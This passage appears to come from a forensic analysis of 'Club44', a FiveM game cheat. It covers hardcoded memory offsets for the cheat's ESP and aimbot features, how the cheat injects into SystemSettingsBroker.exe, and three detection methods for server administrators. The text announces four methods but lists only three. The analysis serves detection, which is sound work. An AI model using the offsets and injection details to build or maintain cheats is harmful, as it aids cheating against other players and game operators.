The entity struct is read directly from FiveM process memory via the external cheat's memory reading loop. The visibility byte at +0x2bb is used by the ESP and wallhack features. The parent vehicle pointer at +0x378 feeds the vehicle theft detection used by the StealVehicle feature. The global at base+0x4b00 is the entity list head iterated by the aimbot target selector.

These offsets are hardcoded in the binary — not resolved dynamically, not obfuscated. If FiveM updates its memory layout and changes these offsets, Club44 breaks immediately and silently. If Club44 does not break, the offsets have not changed and these values remain valid as detection anchors. Either way, the fully recovered struct layout is documented here for use in memory forensics and signature generation.

Detection

Club44 is detectable by four independent methods, any one of which is sufficient. The User-Agent check requires no access to the suspect machine at all — only network logs.

1

Search Network Logs for "Club44-FiveM-External/1.0"

This is the highest-yield detection method because it requires no screenshare, no access to the suspect machine, and no cooperation from the user. If your server infrastructure or game server proxy logs HTTP User-Agent strings, search for:

Club44-FiveM-External/1.0

This string is present in every HTTP request Club44 makes. It will appear in web server access logs, proxy logs, firewall logs, DNS over HTTPS request headers, and SIEM telemetry. Any match in your historical network logs to this User-Agent string identifies a Club44 user. The search can be run retroactively against your entire log retention window.

For screenshare sessions with the user present, check browser network traffic or proxy history for this string. If the machine was running Club44 at any point while networked through a monitored gateway, the string will be in the logs.

2

SystemSettingsBroker.exe Modules in System Informer

Open System Informer (formerly Process Hacker) and locate SystemSettingsBroker.exe in the process list. Double-click to open the process properties, then navigate to the Modules tab.

In the module list, look for any of the following, which have no legitimate reason to be loaded in the Windows Settings host process:

  • d3d11.dll (Direct3D — no reason to be here)
  • XInput1_4.dll or any XInput variant
  • winhttp.dll loaded from an unexpected path
  • Any module without a valid file path on disk (memory-only)

The presence of any of these in SystemSettingsBroker.exe is a positive detection without requiring any further analysis.

3

Large Private RWX Memory Region in SystemSettingsBroker.exe

In System Informer with SystemSettingsBroker.exe selected, navigate to the Memory tab. Look for any private memory region with RWX (Read/Write/Execute) permissions in the 5.1–5.5 MB size range. The injected PE32+ payload is mapped at base address 0x140000000.

A private RWX allocation of this size is anomalous in any Windows system process. The Windows Settings infrastructure does not allocate large private executable regions. Any match on both the RWX permission set and the approximate size range (5.0–5.5 MB) in this specific process is a high-confidence indicator of the Club44 injection payload being present in memory.

If Club44 is not currently running but was recently active, the memory region will not be present. In that case, rely on the network log check (Step 1) and prefetch evidence (check for Club44 loader executable entries in C:\Windows\Prefetch\).

Verdict

Club44 is a competent-looking interface wrapped around code that will BSOD your PC if something goes wrong, written by a developer who forgot to strip their Portuguese error messages and appears to believe that "TLS certificate pinning" and "undetectable" are synonymous terms. The error handler is not a security feature. It is what happens when a developer writes cleanup code without understanding what System32 is for. The hardcoded User-Agent string is not a deliberate misdirection. It is what happens when a developer has never opened a proxy log.

Club44 is detectable by four independent methods. The most powerful requires nothing more than a string search in your network access logs — a search that can be run retroactively, silently, and without the user's knowledge. The Club44 developer gifted every server administrator in their potential user base a perfect, permanent, irremovable IOC in the form of a hardcoded HTTP header.

The customers who kept using Club44 after the BSOD reports began are a tribute to the persuasive power of a nice ImGui skin. The developers who shipped this binary — with System32 deletion in the error handler, Portuguese debug strings in the binary, and a self-identifying User-Agent in the HTTP layer — have produced something that merits being used as an instructional example of how not to write software, in any context, for any purpose, at any level of the software development curriculum.